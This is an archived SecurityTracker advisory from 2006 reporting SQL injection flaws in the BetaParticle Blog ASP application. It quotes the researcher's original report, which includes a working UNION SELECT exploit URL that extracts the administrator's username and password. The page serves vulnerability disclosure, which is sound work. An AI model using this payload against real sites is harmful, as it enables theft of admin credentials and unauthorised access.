SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   betaparticle blog Vendors:   betaparticle.com
betaparticle blog Input Validation Bugs in 'id' and 'fldGalleryID' Parameters Permit SQL Injection
SecurityTracker Alert ID:  1015788
SecurityTracker URL:  http://securitytracker.com/id/1015788
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 20 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 6.0 and prior versions
Description:   A vulnerability was reported in betaparticle blog. A remote user can inject SQL commands.

The software does not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

The 'id' parameter in 'template_permalink.asp' and the 'fldGalleryID' parameter in 'template_gallery_detail.asp' is affected.

A demonstration exploit URL is provided:

http://[target]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1

The vendor was notified on March 18, 2006.

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.betaparticle.com/blog/index.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection

--Security Report--
Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection 
Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 18/03/06 05:27 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: BetaParticle (http://www.betaparticle.com/)
Version: 6.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query.
Level: Critical
---
How&Example:
GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]
Example ->
http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1
With this example remote attacker could get admin's pass and can login from
/main.asp
--
Timeline:
* 18/03/2006: Vulnerability found.
* 18/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
Click here and get exploit for this advisory
---


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC